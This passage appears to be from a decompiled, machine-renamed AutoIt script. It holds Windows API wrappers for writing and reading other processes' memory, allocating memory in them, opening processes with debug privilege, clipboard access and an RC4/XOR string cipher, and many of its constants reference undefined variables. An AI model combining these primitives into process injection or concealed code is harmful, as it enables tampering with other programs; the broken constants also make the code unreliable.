  1921. LOCAL $Local000E =DLLCALL("kernel32.dll","INT" ,"WaitForSingleObject","handle" ,$Arg00,"dword" ,$ArgOpt01)
  1922. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
  1923. RETURN $Local000E [ 0 ]
  1924. ENDFUNC
  1925.  
  1926. Func Fn00CE($Arg00,$ArgOpt01=0,$ArgOpt02=TRUE )
  1927. LOCAL $Local0060 ="wstr"
  1928. IF NOT ISSTRING($Arg00)THEN $Local0060 ="struct*"
  1929. LOCAL $Local000E =DLLCALL("kernel32.dll","int" ,"WideCharToMultiByte","uint" ,$ArgOpt01,"dword" , 0 ,$Local0060 ,$Arg00,"int" ,- 1 ,"ptr" , 0 ,"int" , 0 ,"ptr" , 0 ,"ptr" , 0 )
  1930. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  1931. LOCAL $Local0061 =DLLSTRUCTCREATE("char[" &$Local000E [ 0 ]&"]" )
  1932. $Local000E =DLLCALL("kernel32.dll","int" ,"WideCharToMultiByte","uint" ,$ArgOpt01,"dword" , 0 ,$Local0060 ,$Arg00,"int" ,- 1 ,"struct*" ,$Local0061 ,"int" ,$Local000E [ 0 ],"ptr" , 0 ,"ptr" , 0 )
  1933. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  1934. IF $ArgOpt02 THEN RETURN DLLSTRUCTGETDATA($Local0061 , 1 )
  1935. RETURN $Local0061
  1936. ENDFUNC
  1937.  
  1938. Func Fn00CF(BYREF $ArgRef00)
  1939. LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"WindowFromPoint","struct" ,$ArgRef00)
  1940. IF @ERROR THEN RETURN SETERROR( 1 ,@EXTENDED, 0 )
  1941. RETURN $Local000E [ 0 ]
  1942. ENDFUNC
  1943.  
  1944. Func Fn00D0($Arg00,$Arg01)
  1945. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"WriteConsoleW","handle" ,$Arg00,"wstr" ,$Arg01,"dword" ,STRINGLEN($Arg01),"dword*" , 0 ,"ptr" , 0 )
  1946. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1947. RETURN $Local000E [ 0 ]
  1948. ENDFUNC
  1949.  
  1950. Func Fn00D1($Arg00,$Arg01,$Arg02,BYREF $ArgRef03,$ArgOpt04=0)
  1951. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"WriteFile" ,"handle" ,$Arg00,"ptr" ,$Arg01,"dword" ,$Arg02,"dword*" , 0 ,"ptr" ,$ArgOpt04)
  1952. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1953. $ArgRef03=$Local000E [ 4 ]
  1954. RETURN $Local000E [ 0 ]
  1955. ENDFUNC
  1956.  
  1957. Func Fn00D2($Arg00,$Arg01,$Arg02,$Arg03,BYREF $ArgRef04,$ArgOpt05="ptr")
  1958. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"WriteProcessMemory","handle" ,$Arg00,"ptr" ,$Arg01,$ArgOpt05,$Arg02,"ulong_ptr" ,$Arg03,"ulong_ptr*", 0 )
  1959. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1960. $ArgRef04=$Local000E [ 5 ]
  1961. RETURN $Local000E [ 0 ]
  1962. ENDFUNC
  1963.  
  1964. Func Fn00D3($Arg00)
  1965. IF STRINGLEFT($Arg00, 2 )="0x" THEN RETURN BINARYTOsTRING($Arg00)
  1966. RETURN BINARYTOsTRING("0x" &$Arg00)
  1967. ENDFUNC
  1968.  
  1969. Func Fn00D4($Arg00,$Arg01,$Arg02,$ArgOpt03=-1)
  1970. LOCAL $Local0062 =""
  1971. IF $ArgOpt03=DEFAULT OR $ArgOpt03=- 1 THEN $Local0062 ="(?i)"
  1972. LOCAL $Local0063 ="(\.|\||\*|\?|\+|\(|\)|\{|\}|\[|\]|\^|\$|\\)"
  1973. $Arg01=STRINGREGEXPREPLACE($Arg01,$Local0063 ,"\\$1" )
  1974. $Arg02=STRINGREGEXPREPLACE($Arg02,$Local0063 ,"\\$1" )
  1975. IF $Arg01="" THEN $Arg01="\A"
  1976. IF $Arg02="" THEN $Arg02="\z"
  1977. LOCAL $Local0064 =STRINGREGEXP($Arg00,"(?s)" &$Local0062 &$Arg01&"(.*?)" &$Arg02, 3 )
  1978. IF @ERROR THEN RETURN SETERROR( 1 , 0 , 0 )
  1979. RETURN $Local0064
  1980. ENDFUNC
  1981.  
  1982. Func Fn00D5($Arg00,$Arg01,$Arg02,$ArgOpt03=1)
  1983. IF $Arg00<> 0 AND $Arg00<> 1 THEN
  1984. SETERROR( 1 , 0 ,"")
  1985. ELSEIF $Arg01="" OR $Arg02="" THEN
  1986. SETERROR( 1 , 0 ,"")
  1987. ELSE
  1988. IF NUMBER($ArgOpt03)<= 0 OR INT($ArgOpt03)<>$ArgOpt03 THEN $ArgOpt03= 1
  1989. LOCAL $Var015B
  1990. LOCAL $Var015C
  1991. LOCAL $Var015D
  1992. LOCAL $Var015E
  1993. LOCAL $Local0065 [0x0100 ][ 2 ]
  1994. LOCAL $Var015F
  1995. LOCAL $Var0160
  1996. LOCAL $Var0161
  1997. LOCAL $Var0162
  1998. LOCAL $Var0163
  1999. LOCAL $Var0164
  2000. LOCAL $Var0165
  2001. IF $Arg00= 1 THEN
  2002. FOR $Var0166 = 0 TO $ArgOpt03 STEP 1
  2003. $Var015D =""
  2004. $Var015C =""
  2005. $Var015B =""
  2006. FOR $Var015D = 1 TO STRINGLEN($Arg01)
  2007. IF $Var015C =STRINGLEN($Arg02)THEN
  2008. $Var015C = 1
  2009. ELSE
  2010. $Var015C += 1
  2011. ENDIF
  2012. $Var015B =$Var015B &CHR(BITXOR(ASC(STRINGMID($Arg01,$Var015D , 1 )),ASC(STRINGMID($Arg02,$Var015C , 1 )),0x00FF ))
  2013. NEXT
  2014. $Arg01=$Var015B
  2015. $Var015F =""
  2016. $Var0160 = 0
  2017. $Var0161 =""
  2018. $Var0162 =""
  2019. $Var0163 =""
  2020. $Var0165 =""
  2021. $Var0164 =""
  2022. $Var015E =""
  2023. $Local0065 =""
  2024. LOCAL $Local0065 [0x0100 ][ 2 ]
  2025. FOR $Var015F = 0 TO 0x00FF
  2026. $Local0065 [$Var015F ][ 1 ]=ASC(STRINGMID($Arg02,MOD($Var015F ,STRINGLEN($Arg02))+ 1 , 1 ))
  2027. $Local0065 [$Var015F ][ 0 ]=$Var015F
  2028. NEXT
  2029. FOR $Var015F = 0 TO 0x00FF
  2030. $Var0160 =MOD(($Var0160 +$Local0065 [$Var015F ][ 0 ]+$Local0065 [$Var015F ][ 1 ]),0x0100 )
  2031. $Var015E =$Local0065 [$Var015F ][ 0 ]
  2032. $Local0065 [$Var015F ][ 0 ]=$Local0065 [$Var0160 ][ 0 ]
  2033. $Local0065 [$Var0160 ][ 0 ]=$Var015E
  2034. NEXT
  2035. FOR $Var015F = 1 TO STRINGLEN($Arg01)
  2036. $Var0161 =MOD(($Var0161 + 1 ),0x0100 )
  2037. $Var0162 =MOD(($Var0162 +$Local0065 [$Var0161 ][ 0 ]),0x0100 )
  2038. $Var0163 =$Local0065 [MOD(($Local0065 [$Var0161 ][ 0 ]+$Local0065 [$Var0162 ][ 0 ]),0x0100 )][ 0 ]
  2039. $Var0165 =BITXOR(ASC(STRINGMID($Arg01,$Var015F , 1 )),$Var0163 )
  2040. $Var0164 &=HEX($Var0165 , 2 )
  2041. NEXT
  2042. $Arg01=$Var0164
  2043. NEXT
  2044. ELSE
  2045. FOR $Var0166 = 0 TO $ArgOpt03 STEP 1
  2046. $Var0160 = 0
  2047. $Var0161 =""
  2048. $Var0162 =""
  2049. $Var0163 =""
  2050. $Var0165 =""
  2051. $Var0164 =""
  2052. $Var015E =""
  2053. $Local0065 =""
  2054. LOCAL $Local0065 [0x0100 ][ 2 ]
  2055. FOR $Var015F = 0 TO 0x00FF
  2056. $Local0065 [$Var015F ][ 1 ]=ASC(STRINGMID($Arg02,MOD($Var015F ,STRINGLEN($Arg02))+ 1 , 1 ))
  2057. $Local0065 [$Var015F ][ 0 ]=$Var015F
  2058. NEXT
  2059. FOR $Var015F = 0 TO 0x00FF
  2060. $Var0160 =MOD(($Var0160 +$Local0065 [$Var015F ][ 0 ]+$Local0065 [$Var015F ][ 1 ]),0x0100 )
  2061. $Var015E =$Local0065 [$Var015F ][ 0 ]
  2062. $Local0065 [$Var015F ][ 0 ]=$Local0065 [$Var0160 ][ 0 ]
  2063. $Local0065 [$Var0160 ][ 0 ]=$Var015E
  2064. NEXT
  2065. FOR $Var015F = 1 TO STRINGLEN($Arg01)STEP 2
  2066. $Var0161 =MOD(($Var0161 + 1 ),0x0100 )
  2067. $Var0162 =MOD(($Var0162 +$Local0065 [$Var0161 ][ 0 ]),0x0100 )
  2068. $Var0163 =$Local0065 [MOD(($Local0065 [$Var0161 ][ 0 ]+$Local0065 [$Var0162 ][ 0 ]),0x0100 )][ 0 ]
  2069. $Var0165 =BITXOR(DEC(STRINGMID($Arg01,$Var015F , 2 )),$Var0163 )
  2070. $Var0164 =$Var0164 &CHR($Var0165 )
  2071. NEXT
  2072. $Arg01=$Var0164
  2073. $Var015D =""
  2074. $Var015C =""
  2075. $Var015B =""
  2076. FOR $Var015D = 1 TO STRINGLEN($Arg01)
  2077. IF $Var015C =STRINGLEN($Arg02)THEN
  2078. $Var015C = 1
  2079. ELSE
  2080. $Var015C += 1
  2081. ENDIF
  2082. $Var015B &=CHR(BITXOR(ASC(STRINGMID($Arg01,$Var015D , 1 )),ASC(STRINGMID($Arg02,$Var015C , 1 )),0x00FF ))
  2083. NEXT
  2084. $Arg01=$Var015B
  2085. NEXT
  2086. ENDIF
  2087. RETURN $Arg01
  2088. ENDIF
  2089. ENDFUNC
  2090.  
  2091. Func Fn00D6($Arg00,$Arg01,$ArgOpt02=0)
  2092. IF $ArgOpt02> 0 THEN
  2093. $Arg00=STRINGREPLACE($Arg00,$Arg01,CHR( 0 ),$ArgOpt02)
  2094. $Arg01=CHR( 0 )
  2095. ELSEIF $ArgOpt02< 0 THEN
  2096. LOCAL $Local0066 =STRINGINSTR($Arg00,$Arg01, 0 ,$ArgOpt02)
  2097. IF $Local0066 THEN
  2098. $Arg00=STRINGLEFT($Arg00,$Local0066 - 1 )
  2099. ENDIF
  2100. ENDIF
  2101. RETURN STRINGSPLIT($Arg00,$Arg01, 3 )
  2102. ENDFUNC
  2103.  
  2104. Func Fn00D7($Arg00,$Arg01,$Arg02)
  2105. LOCAL $Var0167 ,$Var0168 ,$Var0169
  2106. IF $Arg00="" OR (NOT ISSTRING($Arg00))THEN
  2107. RETURN SETERROR( 1 , 0 ,$Arg00)
  2108. ELSEIF $Arg01="" OR (NOT ISSTRING($Arg00))THEN
  2109. RETURN SETERROR( 2 , 0 ,$Arg00)
  2110. ELSE
  2111. $Var0167 =STRINGLEN($Arg00)
  2112. IF (ABS($Arg02)>$Var0167 )OR (NOT ISINT($Arg02))THEN
  2113. RETURN SETERROR( 3 , 0 ,$Arg00)
  2114. ENDIF
  2115. ENDIF
  2116. IF $Arg02= 0 THEN
  2117. RETURN $Arg01&$Arg00
  2118. ELSEIF $Arg02> 0 THEN
  2119. $Var0168 =STRINGLEFT($Arg00,$Arg02)
  2120. $Var0169 =STRINGRIGHT($Arg00,$Var0167 -$Arg02)
  2121. RETURN $Var0168 &$Arg01&$Var0169
  2122. ELSEIF $Arg02< 0 THEN
  2123. $Var0168 =STRINGLEFT($Arg00,ABS($Var0167 +$Arg02))
  2124. $Var0169 =STRINGRIGHT($Arg00,ABS($Arg02))
  2125. RETURN $Var0168 &$Arg01&$Var0169
  2126. ENDIF
  2127. ENDFUNC
  2128.  
  2129. Func Fn00D8($Arg00)
  2130. LOCAL $Local0067 = 0
  2131. LOCAL $Local0068 = 1
  2132. LOCAL $Local0069 =""
  2133. LOCAL $Var016A
  2134. FOR $Local0067 = 1 TO STRINGLEN($Arg00)
  2135. $Var016A =STRINGMID($Arg00,$Local0067 , 1 )
  2136. SELECT
  2137. CASE $Local0068 = 1
  2138. IF STRINGREGEXP($Var016A ,"[a-zA-ZÀ-ÿšœžŸ]")THEN
  2139. $Var016A =STRINGUPPER($Var016A )
  2140. $Local0068 = 0
  2141. ENDIF
  2142. CASE NOT STRINGREGEXP($Var016A ,"[a-zA-ZÀ-ÿšœžŸ]")
  2143. $Local0068 = 1
  2144. CASE ELSE
  2145. $Var016A =STRINGLOWER($Var016A )
  2146. ENDSELECT
  2147. $Local0069 &=$Var016A
  2148. NEXT
  2149. RETURN $Local0069
  2150. ENDFUNC
  2151.  
  2152. Func Fn00D9($Arg00,$Arg01)
  2153. LOCAL $Var016B
  2154. SELECT
  2155. CASE NOT STRINGISINT($Arg01)
  2156. SETERROR( 1 )
  2157. RETURN ""
  2158. CASE STRINGLEN($Arg00)< 1
  2159. SETERROR( 1 )
  2160. RETURN ""
  2161. CASE $Arg01<= 0
  2162. SETERROR( 1 )
  2163. RETURN ""
  2164. CASE ELSE
  2165. FOR $Local001D = 1 TO $Arg01
  2166. $Var016B &=$Arg00
  2167. NEXT
  2168. RETURN $Var016B
  2169. ENDSELECT
  2170. ENDFUNC
  2171.  
  2172. Func Fn00DA($Arg00)
  2173. LOCAL $Local006A =STRINGLEN($Arg00)
  2174. IF $Local006A < 1 THEN RETURN SETERROR( 1 , 0 ,"")
  2175. LOCAL $Local006B =DLLSTRUCTCREATE("char[" &$Local006A + 1 &"]" )
  2176. DLLSTRUCTSETDATA($Local006B , 1 ,$Arg00)
  2177. LOCAL $Local006C =DLLCALL("msvcrt.dll","ptr:cdecl" ,"_strrev" ,"struct*" ,$Local006B )
  2178. IF @ERROR OR $Local006C [ 0 ]= 0 THEN RETURN SETERROR( 2 , 0 ,"")
  2179. RETURN DLLSTRUCTGETDATA($Local006B , 1 )
  2180. ENDFUNC
  2181.  
  2182. Func Fn00DB($Arg00)
  2183. RETURN HEX(STRINGTOBINARY($Arg00))
  2184. ENDFUNC
  2185. GLOBAL CONST $Var016C =NUMBER($Var016D )
  2186. GLOBAL CONST $Var016E =NUMBER($Var016F )
  2187. GLOBAL CONST $Var0170 =NUMBER($Var0171 )
  2188. GLOBAL CONST $Var0172 =NUMBER($Var0173 )
  2189. GLOBAL CONST $Var0174 =NUMBER($Var0175 )
  2190. GLOBAL CONST $Var0176 =NUMBER($Var0177 )
  2191. GLOBAL CONST $Var0178 =NUMBER($Var0179 )
  2192. GLOBAL CONST $Var017A =NUMBER($Var017B )
  2193. GLOBAL CONST $Var017C =NUMBER($Var017D )
  2194. GLOBAL CONST $Var017E =NUMBER($Var017F )
  2195. GLOBAL CONST $Var0180 =NUMBER($Var0181 )
  2196. GLOBAL CONST $Var0182 =NUMBER($Var0183 )
  2197. GLOBAL CONST $Var0184 =NUMBER($Var0185 )
  2198. GLOBAL CONST $Var0186 =NUMBER($Var0187 )
  2199. GLOBAL CONST $Var0188 =$Var016C +$Var0174
  2200. GLOBAL CONST $Var0189 =$Var016E +$Var0174
  2201. GLOBAL CONST $Var018A =NUMBER($Var018B )
  2202. GLOBAL CONST $Var018C =NUMBER($Var018D )
  2203. GLOBAL CONST $Var018E =NUMBER($Var018F )
  2204. GLOBAL CONST $Var0190 =NUMBER($Var0191 )
  2205. GLOBAL CONST $Var0192 =NUMBER($Var0193 )
  2206. GLOBAL CONST $Var0194 =NUMBER($Var0195 )
  2207. GLOBAL CONST $Var0196 =NUMBER($Var0197 )
  2208. GLOBAL CONST $Var0198 =NUMBER($Var0199 )
  2209. GLOBAL CONST $Var019A =NUMBER($Var019B )
  2210. GLOBAL CONST $Var019C =NUMBER($Var019D )
  2211. GLOBAL CONST $Var019E =NUMBER($Var019F )
  2212. GLOBAL CONST $Var01A0 =NUMBER($Var01A1 )
  2213. GLOBAL CONST $Var01A2 =NUMBER($Var01A3 )
  2214. GLOBAL CONST $Var01A4 =NUMBER($Var01A5 )
  2215. GLOBAL CONST $Var01A6 =NUMBER($Var01A7 )
  2216. GLOBAL CONST $Var01A8 =NUMBER($Var01A9 )
  2217. GLOBAL CONST $Var01AA =NUMBER($Var01AB )
  2218. GLOBAL CONST $Var01AC =NUMBER($Var01AD )
  2219. GLOBAL CONST $Var01AE =NUMBER($Var01AF )
  2220. GLOBAL CONST $Var01B0 =NUMBER($Var01B1 )
  2221. GLOBAL CONST $Var01B2 =NUMBER($Var01B3 )
  2222. GLOBAL CONST $Var01B4 =NUMBER($Var01B5 )
  2223. GLOBAL CONST $Var01B6 =NUMBER($Var01B7 )
  2224. GLOBAL CONST $Var01B8 =NUMBER($Var01B9 )
  2225. GLOBAL CONST $Var01BA =NUMBER($Var01BB )
  2226. GLOBAL CONST $Var01BC =NUMBER($Var01BD )
  2227. GLOBAL CONST $Var01BE =NUMBER($Var01BF )
  2228. GLOBAL CONST $Var01C0 =$Var01C1
  2229.  
  2230. Func Fn00DC(BYREF $ArgRef00)
  2231. LOCAL $Local006D =DLLSTRUCTGETDATA($ArgRef00,"Mem" )
  2232. LOCAL $Local006E =DLLSTRUCTGETDATA($ArgRef00,"hProc" )
  2233. LOCAL $Local006F =Fn00E9($Local006E ,$Local006D , 0 ,$Var01A4 )
  2234. DLLCALL("kernel32.dll","bool" ,"CloseHandle","handle" ,$Local006E )
  2235. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  2236. RETURN $Local006F
  2237. ENDFUNC
  2238.  
  2239. Func Fn00DD($Arg00,$ArgOpt01=0)
  2240. LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"GlobalAlloc","uint" ,$ArgOpt01,"ulong_ptr" ,$Arg00)
  2241. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  2242. RETURN $Local000E [ 0 ]
  2243. ENDFUNC
  2244.  
  2245. Func Fn00DE($Arg00)
  2246. LOCAL $Local000E =DLLCALL("kernel32.dll","ptr" ,"GlobalFree","handle" ,$Arg00)
  2247. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  2248. RETURN $Local000E [ 0 ]
  2249. ENDFUNC
  2250.  
  2251. Func Fn00DF($Arg00)
  2252. LOCAL $Local000E =DLLCALL("kernel32.dll","ptr" ,"GlobalLock","handle" ,$Arg00)
  2253. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  2254. RETURN $Local000E [ 0 ]
  2255. ENDFUNC
  2256.  
  2257. Func Fn00E0($Arg00)
  2258. LOCAL $Local000E =DLLCALL("kernel32.dll","ulong_ptr" ,"GlobalSize","handle" ,$Arg00)
  2259. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  2260. RETURN $Local000E [ 0 ]
  2261. ENDFUNC
  2262.  
  2263. Func Fn00E1($Arg00)
  2264. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"GlobalUnlock","handle" ,$Arg00)
  2265. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  2266. RETURN $Local000E [ 0 ]
  2267. ENDFUNC
  2268.  
  2269. Func Fn00E2($Arg00,$Arg01,BYREF $ArgRef02)
  2270. LOCAL $Local000E =DLLCALL("User32.dll","dword" ,"GetWindowThreadProcessId","hwnd" ,$Arg00,"dword*" , 0 )
  2271. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  2272. LOCAL $Local0070 =$Local000E [ 2 ]
  2273. IF $Local0070 = 0 THEN RETURN SETERROR( 1 , 0 , 0 )
  2274. LOCAL $Local0071 =BITOR($Var01AC ,$Var01AE ,$Var01B0 )
  2275. LOCAL $Local006E =Fn00EA($Local0071 ,FALSE ,$Local0070 ,TRUE )
  2276. LOCAL $Local0072 =BITOR($Var018C ,$Var018A )
  2277. LOCAL $Local006D =Fn00E7($Local006E , 0 ,$Arg01,$Local0072 ,$Var0196 )
  2278. IF $Local006D = 0 THEN RETURN SETERROR( 2 , 0 , 0 )
  2279. $ArgRef02=DLLSTRUCTCREATE($Var01C0 )
  2280. DLLSTRUCTSETDATA($ArgRef02,"hProc" ,$Local006E )
  2281. DLLSTRUCTSETDATA($ArgRef02,"Size" ,$Arg01)
  2282. DLLSTRUCTSETDATA($ArgRef02,"Mem" ,$Local006D )
  2283. RETURN $Local006D
  2284. ENDFUNC
  2285.  
  2286. Func Fn00E3($Arg00,$Arg01,$Arg02)
  2287. DLLCALL("kernel32.dll","none" ,"RtlMoveMemory","struct*" ,$Arg01,"struct*" ,$Arg00,"ulong_ptr" ,$Arg02)
  2288. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED)
  2289. ENDFUNC
  2290.  
  2291. Func Fn00E4(BYREF $ArgRef00,$Arg01,$Arg02,$Arg03)
  2292. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"ReadProcessMemory","handle" ,DLLSTRUCTGETDATA($ArgRef00,"hProc" ),"ptr" ,$Arg01,"struct*" ,$Arg02,"ulong_ptr" ,$Arg03,"ulong_ptr*", 0 )
  2293. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  2294. RETURN $Local000E [ 0 ]
  2295. ENDFUNC
  2296.  
  2297. Func Fn00E5(BYREF $ArgRef00,$Arg01,$ArgOpt02=0,$ArgOpt03=0,$ArgOpt04="struct*")
  2298. IF $ArgOpt02= 0 THEN $ArgOpt02=DLLSTRUCTGETDATA($ArgRef00,"Mem" )
  2299. IF $ArgOpt03= 0 THEN $ArgOpt03=DLLSTRUCTGETDATA($ArgRef00,"Size" )
  2300. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"WriteProcessMemory","handle" ,DLLSTRUCTGETDATA($ArgRef00,"hProc" ),"ptr" ,$ArgOpt02,$ArgOpt04,$Arg01,"ulong_ptr" ,$ArgOpt03,"ulong_ptr*", 0 )
  2301. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  2302. RETURN $Local000E [ 0 ]
  2303. ENDFUNC
  2304.  
  2305. Func Fn00E6($Arg00,$Arg01,$Arg02,$Arg03)
  2306. LOCAL $Local000E =DLLCALL("kernel32.dll","ptr" ,"VirtualAlloc","ptr" ,$Arg00,"ulong_ptr" ,$Arg01,"dword" ,$Arg02,"dword" ,$Arg03)
  2307. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  2308. RETURN $Local000E [ 0 ]
  2309. ENDFUNC
  2310.  
  2311. Func Fn00E7($Arg00,$Arg01,$Arg02,$Arg03,$Arg04)
  2312. LOCAL $Local000E =DLLCALL("kernel32.dll","ptr" ,"VirtualAllocEx","handle" ,$Arg00,"ptr" ,$Arg01,"ulong_ptr" ,$Arg02,"dword" ,$Arg03,"dword" ,$Arg04)
  2313. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  2314. RETURN $Local000E [ 0 ]
  2315. ENDFUNC
  2316.  
  2317. Func Fn00E8($Arg00,$Arg01,$Arg02)
  2318. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"VirtualFree","ptr" ,$Arg00,"ulong_ptr" ,$Arg01,"dword" ,$Arg02)
  2319. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  2320. RETURN $Local000E [ 0 ]
  2321. ENDFUNC
  2322.  
  2323. Func Fn00E9($Arg00,$Arg01,$Arg02,$Arg03)
  2324. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"VirtualFreeEx","handle" ,$Arg00,"ptr" ,$Arg01,"ulong_ptr" ,$Arg02,"dword" ,$Arg03)
  2325. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  2326. RETURN $Local000E [ 0 ]
  2327. ENDFUNC
  2328.  
  2329. Func Fn00EA($Arg00,$Arg01,$Arg02,$ArgOpt03=FALSE )
  2330. LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"OpenProcess","dword" ,$Arg00,"bool" ,$Arg01,"dword" ,$Arg02)
  2331. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  2332. IF $Local000E [ 0 ]THEN RETURN $Local000E [ 0 ]
  2333. IF NOT $ArgOpt03 THEN RETURN 0
  2334. LOCAL $Local0001 =Fn0000(BITOR($Var0152 ,$Var0153 ))
  2335. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  2336. Fn0001($Local0001 ,"SeDebugPrivilege",TRUE )
  2337. LOCAL $Local0053 =@ERROR
  2338. LOCAL $Local0054 =@EXTENDED
  2339. LOCAL $Local0055 = 0
  2340. IF NOT @ERROR THEN
  2341. $Local000E =DLLCALL("kernel32.dll","handle" ,"OpenProcess","dword" ,$Arg00,"bool" ,$Arg01,"dword" ,$Arg02)
  2342. $Local0053 =@ERROR
  2343. $Local0054 =@EXTENDED
  2344. IF $Local000E [ 0 ]THEN $Local0055 =$Local000E [ 0 ]
  2345. Fn0001($Local0001 ,"SeDebugPrivilege",FALSE )
  2346. IF @ERROR THEN
  2347. $Local0053 =@ERROR
  2348. $Local0054 =@EXTENDED
  2349. ENDIF
  2350. ENDIF
  2351. DLLCALL("kernel32.dll","bool" ,"CloseHandle","handle" ,$Local0001 )
  2352. RETURN SETERROR($Local0053 ,$Local0054 ,$Local0055 )
  2353. ENDFUNC
  2354. GLOBAL CONST $Var01C2 =NUMBER($Var01C3 )
  2355. GLOBAL CONST $Var01C4 =NUMBER($Var01C5 )
  2356. GLOBAL CONST $Var01C6 =NUMBER($Var01C7 )
  2357. GLOBAL CONST $Var01C8 =NUMBER($Var01C9 )
  2358. GLOBAL CONST $Var01CA =NUMBER($Var01CB )
  2359. GLOBAL CONST $Var01CC =NUMBER($Var01CD )
  2360. GLOBAL CONST $Var01CE =NUMBER($Var01CF )
  2361. GLOBAL CONST $Var01D0 =NUMBER($Var01D1 )
  2362. GLOBAL CONST $Var01D2 =NUMBER($Var01D3 )
  2363. GLOBAL CONST $Var01D4 =NUMBER($Var01D5 )
  2364. GLOBAL CONST $Var01D6 =NUMBER($Var01D7 )
  2365. GLOBAL CONST $Var01D8 =NUMBER($Var01D9 )
  2366. GLOBAL CONST $Var01DA =NUMBER($Var01DB )
  2367. GLOBAL CONST $Var01DC =NUMBER($Var01DD )
  2368. GLOBAL CONST $Var01DE =NUMBER($Var01DF )
  2369. GLOBAL CONST $Var01E0 =NUMBER($Var01E1 )
  2370. GLOBAL CONST $Var01E2 =NUMBER($Var01E3 )
  2371. GLOBAL CONST $Var01E4 =NUMBER($Var01E5 )
  2372. GLOBAL CONST $Var01E6 =NUMBER($Var01E7 )
  2373. GLOBAL CONST $Var01E8 =NUMBER($Var01E9 )
  2374. GLOBAL CONST $Var01EA =NUMBER($Var01EB )
  2375. GLOBAL CONST $Var01EC =NUMBER($Var01ED )
  2376. GLOBAL CONST $Var01EE =NUMBER($Var01EF )
  2377. GLOBAL CONST $Var01F0 =NUMBER($Var01F1 )
  2378. GLOBAL CONST $Var01F2 =NUMBER($Var01F3 )
  2379. GLOBAL CONST $Var01F4 =NUMBER($Var01F5 )
  2380.  
  2381. Func Fn00EB($Arg00,$Arg01)
  2382. DLLCALL("user32.dll","bool" ,"ChangeClipboardChain","hwnd" ,$Arg00,"hwnd" ,$Arg01)
  2383. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED)
  2384. ENDFUNC
  2385.  
  2386. Func Fn00EC()
  2387. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"CloseClipboard")
  2388. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  2389. RETURN $Local000E [ 0 ]
  2390. ENDFUNC
  2391.  
  2392. Func Fn00ED()
  2393. LOCAL $Local000E =DLLCALL("user32.dll","int" ,"CountClipboardFormats")
  2394. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  2395. RETURN $Local000E [ 0 ]
  2396. ENDFUNC
  2397.  
  2398. Func Fn00EE()
  2399. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"EmptyClipboard")
  2400. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  2401. RETURN $Local000E [ 0 ]
  2402. ENDFUNC
  2403.  
  2404. Func Fn00EF($Arg00)
  2405. LOCAL $Local000E =DLLCALL("user32.dll","uint" ,"EnumClipboardFormats","uint" ,$Arg00)
  2406. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  2407. RETURN $Local000E [ 0 ]
  2408. ENDFUNC
  2409.  
  2410. Func Fn00F0($Arg00)
  2411. LOCAL $Local0073 [0x0012 ]=[0x0011 ,"Text" ,"Bitmap" ,"Metafile Picture","SYLK" ,"DIF" ,"TIFF" ,"OEM Text" ,"DIB" ,"Palette" ,"Pen Data" ,"RIFF" ,"WAVE" ,"Unicode Text","Enhanced Metafile","HDROP" ,"Locale" ,"DIB V5" ]
  2412. IF $Arg00>= 1 AND $Arg00<=0x0011 THEN RETURN $Local0073 [$Arg00]
  2413. SWITCH $Arg00
  2414. CASE $Var01E4
  2415. RETURN "Owner Display"
  2416. CASE $Var01E6
  2417. RETURN "Private Text"
  2418. CASE $Var01E8
  2419. RETURN "Private Bitmap"
  2420. CASE $Var01EA
  2421. RETURN "Private Metafile Picture"
  2422. CASE $Var01EC
  2423. RETURN "Private Enhanced Metafile"
  2424. CASE ELSE
  2425. RETURN Fn00F3($Arg00)
  2426. ENDSWITCH
  2427. ENDFUNC
  2428.  
  2429. Func Fn00F1($ArgOpt00=1)
  2430. IF NOT Fn00F9($ArgOpt00)THEN RETURN SETERROR(- 1 , 0 , 0 )
  2431. IF NOT Fn00FA( 0 )THEN RETURN SETERROR(- 2 , 0 , 0 )
